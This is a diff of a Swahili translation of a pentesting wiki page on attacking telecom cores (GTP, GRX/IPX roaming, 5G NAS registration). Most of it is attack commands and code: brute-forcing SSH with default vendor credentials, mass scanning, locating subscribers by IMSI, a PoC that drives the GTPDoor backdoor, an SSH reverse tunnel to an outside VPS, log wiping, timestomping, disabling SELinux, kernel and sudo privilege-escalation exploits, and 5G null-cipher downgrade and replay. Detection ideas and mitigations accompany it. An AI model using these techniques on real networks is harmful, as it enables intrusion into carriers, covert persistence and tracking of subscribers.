Translated ['', 'src/generic-methodologies-and-resources/pentesting-netw

src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md

@@ -1,27 +1,27 @@
-# Telecom Network Exploitation (GTP / Roaming Environments)
+# Utekaji wa Mtandao wa Telecom (GTP / Roaming Environments)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!NOTE]
-> Protokali za msingi za simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupita kwenye mifumo ya GRX/IPX ya kuhamahama ambayo inaaminika kwa kiasi fulani.  Kwa sababu zinatumia UDP bila uthibitisho wowote, **mara nyingi mguu wowote ndani ya mipaka ya telecom unaweza kufikia moja kwa moja ndege za ishara za msingi**.  Maelezo yafuatayo yanakusanya mbinu za mashambulizi zilizoshuhudiwa katika mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
+> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) mara nyingi husafiri kwenye semi-trusted GRX/IPX roaming backbones. Kwa sababu zinatumia UDP wazi bila uthibitisho mwingi, **nafasi ya kuingia ndani ya mipaka ya telecom mara nyingi inaweza kufikia ngazi za uashiriaji za msingi moja kwa moja**. Vidokezo vinavyoifuata vinakusanya mbinu za mashambulizi zilizoshuhudiwa kwenye mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
 
-## 1. Recon & Initial Access
+## 1. Uchunguzi & Upataji wa Awali
 
-### 1.1  Default OSS / NE Accounts
+### 1.1  Akaunti za OSS / NE za Chaguo-msingi
-Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force:
+Seti kubwa, kwa mshangao, ya vendor network elements huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha maalum ya maneno (wordlist) inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
 ```bash
 hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
 ```
-Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
+Ikiwa kifaa kinatoa management VRF pekee, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).
 
-### 1.2  Ugunduzi wa Mwenyeji ndani ya GRX/IPX
+### 1.2  Ugundaji wa Host ndani ya GRX/IPX
-Watoa huduma wengi wa GRX bado wanaruhusu **ICMP echo** kupitia msingi. Changanya `masscan` na uchunguzi wa `gtpv1` UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C:
+Wengi wa waendeshaji wa GRX bado huruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na probe za UDP zilizojengwa `gtpv1` ili ramani kwa haraka wasikilizi wa GTP-C:
 ```bash
 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
 ```
-## 2. Kuorodhesha Wajibu – `cordscan`
+## 2. Kuorodhesha Abonenti – `cordscan`
 
-Zana hii ya Go inatengeneza **GTP-C Create PDP Context Request** pakiti na kurekodi majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
+Zana ifuatayo ya Go inatengeneza vifurushi vya **GTP-C Create PDP Context Request** na inarekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN aliyotembelewa na abonenti.
 ```bash
 # Build
 GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@@ -29,22 +29,22 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
 # Usage (typical):
 ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
 ```
-Key flags:
+Bendera kuu:
-- `--imsi` Lengo la mteja IMSI
+- `--imsi` IMSI ya mteja lengwa
-- `--oper` Nyumbani / HNI (MCC+MNC)
+- `--oper` Home / HNI (MCC+MNC)
-- `-w`      Andika pakiti za raw kwenye pcap
+- `-w`      Andika vifurushi ghafi kwenye pcap
 
-Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana:
+Vigezo muhimu ndani ya binary vinaweza kurekebishwa ili kupanua skani:
 ```
 pingtimeout       = 3   // seconds before giving up
 pco               = 0x218080
 common_tcp_ports  = "22,23,80,443,8080"
 ```
-## 3. Utekelezaji wa Kanuni kupitia GTP – `GTPDoor`
+## 3. Code Execution over GTP – `GTPDoor`
 
-`GTPDoor` ni huduma ndogo ya ELF ambayo **inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja**. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia `/bin/sh -c`. Stdout/stderr zinahamishwa ndani ya **Echo Response** ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa.
+`GTPDoor` ni huduma ndogo ya ELF ambayo **inasikiliza UDP 2123 na inachambua kila packet ya GTP-C inayokuja**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya **Echo Response** messages ili hakuna outward session ipatikane.
 
-Pakiti ya PoC ya chini (Python):
+Minimal PoC packet (Python):
 ```python
 import gtpc, Crypto.Cipher.AES as AES
 key = b"SixteenByteKey!"
@@ -52,38 +52,38 @@ cmd = b"id;uname -a"
 enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
 print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
 ```
-Detection:
+Utambuzi:
-* mwenyeji yeyote anayepeleka **Maombi ya Echo yasiyo sawa** kwa IP za SGSN
+* host yoyote inayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
-* Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) – mabadiliko kutoka kwa spesifiki
+* bendera ya GTP version imewekwa kwa 1 wakati message type = 1 (Echo) – deviation from spec
 
 ## 4. Pivoting Through the Core
 
 ### 4.1  `sgsnemu` + SOCKS5
-`OsmoGGSN` inatoa emulators ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha `tun0` kinachoweza kufikiwa kutoka kwa mwenzi wa roaming.
+`OsmoGGSN` hutoa SGSN emulator inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara baada ya makubaliano, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
 ```bash
 sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
 -APN internet -c 1 -d
 ip route add 172.16.0.0/12 dev tun0
 microsocks -p 1080 &   # internal SOCKS proxy
 ```
-Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye **data plane**.
+Kwa hair-pinning sahihi ya firewall, tunnel hii inapita kando ya signalling-only VLANs na inakuweka moja kwa moja kwenye **data plane**.
 
-### 4.2  SSH Reverse Tunnel juu ya Port 53
+### 4.2  SSH Reverse Tunnel over Port 53
-DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama.  Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
+DNS karibu kila mara iko wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwa VPS yako ikisikiliza kwenye :53, kisha rudi nyumbani baadaye:
 ```bash
 ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
 ```
-Check that `GatewayPorts yes` is enabled on the VPS.
+Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
 
 ## 5. Covert Channels
 
-| Channel | Transport | Decoding | Notes |
+| Chaneli | Usafirishaji | Kuutafsiri | Maelezo |
-|---------|-----------|----------|-------|
+|---------|--------------|------------|---------|
-| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikivu safi, hakuna trafiki ya nje |
+| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji pasivu kabisa, hakuna trafiki ya kutoka |
-| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) imekodishwa katika octets za rekodi A | inatazama sub-domain `*.nodep` |
-| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inachanganyika na mazungumzo halali ya GTP-C |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob katika private IE | inajumuika na mazungumzo halali ya GTP-C |
 
-All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
+Implants zote zina watchdogs zinazofanya **timestomp** binaries zao na ku-re-spawn ikiwa zimecrash.
 
 ## 6. Defense Evasion Cheatsheet
 ```bash
@@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm    # appears as [kworker/1]
 touch -r /usr/bin/time /usr/bin/chargen   # timestomp
 setenforce 0                              # disable SELinux
 ```
-## 7. Kuinua Haki kwenye NE za Kizamani
+## 7. Privilege Escalation kwenye Legacy NE
 ```bash
 # DirtyCow – CVE-2016-5195
 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
@@ -111,30 +111,137 @@ python3 PwnKit.py
 # Sudo Baron Samedit – CVE-2021-3156
 python3 exploit_userspec.py
 ```
-Usafi wa mazingira:
+Kidokezo cha usafishaji:
 ```bash
 userdel firefart 2>/dev/null
 rm -f /tmp/sh ; history -c
 ```
-## 8. Tool Box
+## 8. Zana
 
-* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – zana za kawaida zilizoelezwa katika sehemu za awali.
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – zana maalum zilizotajwa katika sehemu zilizopita.
-* `FScan` : skanning ya TCP ya intranet (`fscan -p 22,80,443 10.0.0.0/24`)
+* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
 * `Responder` : LLMNR/NBT-NS rogue WPAD
-* `Microsocks` + `ProxyChains` : pivoting nyepesi wa SOCKS5
+* `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5
-* `FRP` (≥0.37) : NAT traversal / bridging ya mali
+* `FRP` (≥0.37) : uvuka NAT / kuunganisha mali
+
+## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
+
+Taratibu ya usajili ya 5G inaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe na Security Mode Command/Complete, ujumbe wa awali hauhakikiwa na haujasimbwa. Dirisha hili kabla ya usalama linaweza kuwezesha njia mbalimbali za kushambulia wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
+
+Mtiririko wa usajili (ulifupishwa):
+- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa) na sifa/uwezo.
+- Authentication: AMF/AUSF hutuma RAND/AUTN; UE hurudisha RES*.
+- Security Mode Command/Complete: uadilifu na usimbaji wa NAS vinajadiliwa na kuanzishwa.
+- PDU Session Establishment: usanidi wa IP/QoS.
+
+Vidokezo vya kuanzisha maabara (si-RF):
+- Core: usanidi wa default wa Open5GS unatosha kuiga mtiririko.
+- UE: simulator au UE ya majaribio; tumia Wireshark kuchambua.
+- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
+- Useful display filters in Wireshark:
+- ngap.procedure_code == 15 (InitialUEMessage)
+- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
+
+### 9.1 Faragha ya kitambulisho: kushindwa kwa SUCI kunachofichua SUPI/IMSI
+Kinachotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa funguo ya umma ya home-network). Kupata SUPI/IMSI ya plaintext katika Registration Request kunaonyesha kasoro ya faragha inayoweza kuwezesha ufuatiliaji wa mteja kwa kudumu.
+
+Jinsi ya kujaribu:
+- Kamua ujumbe wa kwanza wa NAS katika InitialUEMessage na kagua Mobile Identity IE.
+- Uhakiki wa haraka wa Wireshark:
+- Inapaswa kutafsiriwa kama SUCI, si IMSI.
+- Mfano wa vichujio: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na kuwepo kwa `imsi` indicates leakage.
+
+Nini cha kukusanya:
+- MCC/MNC/MSIN ikiwa imefunuliwa; rekodi kwa kila UE na fuatilia kwa muda/mahali.
+
+Kuzuia:
+- Lazimisha UEs/USIMs zinazotuma SUCI pekee; toa tahadhari kwa IMSI/SUPI yoyote katika NAS ya awali.
+
+### 9.2 Kupungua kwa uwezo hadi algorithimu za null (EEA0/EIA0)
+Asili:
+- UE inatangaza EEA (encryption) na EIA (integrity) zinazotegemewa katika UE Security Capability IE ya Registration Request.
+- Mepangilio ya kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algorithimu za null.
+
+Tatizo:
+- Kwa sababu Registration Request haijalindwa kwa uadilifu, mshambuliaji aliye on-path anaweza kuzima bits za capability ili kulazimisha uteuzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks vibaya huwaruhusu algorithimu za null hata nje ya huduma za dharura.
+
+Hatua za kushambulia:
+- Shika InitialUEMessage na badilisha NAS UE Security Capability ili itangaze EEA0/EIA0 tu.
+- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kupeleka mbele.
+- Angalia kama AMF inakubali ciphers/udhibiti za null na inakamilisha Security Mode kwa EEA0/EIA0.
+
+Uthibitisho/uwazi:
+- Katika Wireshark, thibitisha algorithimu zilizochaguliwa baada ya Security Mode Command/Complete.
+- Mfano wa matokeo ya passive sniffer:
+```
+Encyrption in use [EEA0]
+Integrity in use [EIA0, EIA1, EIA2]
+SUPI (MCC+MNC+MSIN) 9997000000001
+```
+Mikakati ya kupunguza (lazima):
+- Sanidi AMF/policy ili kukataa EEA0/EIA0 isipokuwa pale inapohitajika kwa umakini (mf., simu za dharura).
+- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa onyo/alaramu kwa muktadha wowote wa usalama wa NAS unaojadiliana na null algorithms.
+
+### 9.3 Replay ya initial Registration Request (pre-security NAS)
+Kwa sababu initial NAS haina integrity na freshness, InitialUEMessage+Registration Request iliyorekodiwa inaweza kureplayed kwa AMF.
+
+PoC rule for 5GReplay to forward matching replays:
+```xml
+<beginning>
+<property value="THEN"
+property_id="101"
+type_property="FORWARD"
+description="Forward InitialUEMessage with Registration Request">
+
+<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
+<event value="COMPUTE"
+event_id="1"
+description="Trigger: InitialUEMessage"
+boolean_expression="ngap.procedure_code == 15"/>
+
+<!-- Context match on NAS Registration Request (message_type == 65) -->
+<event value="COMPUTE"
+event_id="2"
+description="Context: Registration Request"
+boolean_expression="nas_5g.message_type == 65"/>
+
+</property>
+</beginning>
+```
+Kile cha kuangalia:
+- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa freshness/context validation unaonyesha udhaifu.
+
+Mitigations:
+- Enforce replay protection/context binding kwenye AMF; rate-limit na correlate per-GNB/UE.
+
+### 9.4 Tooling pointers (reproducible)
+- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
+- Wireshark: hakiki decodes za NGAP/NAS; tumia filters zilizo juu kutenganisha Registration.
+- 5GReplay: capture registration, kisha replay NGAP + NAS messages maalum kama ilivyo kwenye rule.
+- Sni5Gect: live sniff/modify/inject NAS control-plane ili kulazimisha null algorithms au kuingilia authentication sequences.
+
+### 9.5 Defensive checklist
+- Fuatilia kila wakati Registration Request kwa SUPI/IMSI zilizo wazi (plaintext); zuia vifaa/USIMs vinavyokiuka.
+- Kataa EEA0/EIA0 isipokuwa taratibu za dharura zilizoelezwa kwa ukungu; hitaji angalau EEA2/EIA2.
+- Gundua infrastructure haramu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
+- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara za InitialUEMessage.
 
 ---
 ## Detection Ideas
-1. **Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP**.
+1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**.
-2. **Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH** kutoka kwa IP za ndani.
+2. **Ports zisizo za kawaida (53, 80, 443) kupokea SSH handshakes** kutoka internal IPs.
-3. **Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana** – yanaweza kuashiria beacon za GTPDoor.
+3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** – inaweza kuashiria GTPDoor beacons.
-4. **Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano**.
+4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence fields kubwa, zisizo sifuri**.
+5. 5G: **InitialUEMessage yenye NAS Registration Requests zinazorudiwa kutoka identical endpoints** (replay signal).
+6. 5G: **NAS Security Mode negotiating EEA0/EIA0** nje ya emergency contexts.
 
 ## References
 
 - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
 - 3GPP TS 29.281 – GTPv2-C (v17.6.0)
+- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
+- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
+- 3GPP TS 33.501 – Security architecture and procedures for 5G System
 
 {{#include ../../banners/hacktricks-training.md}}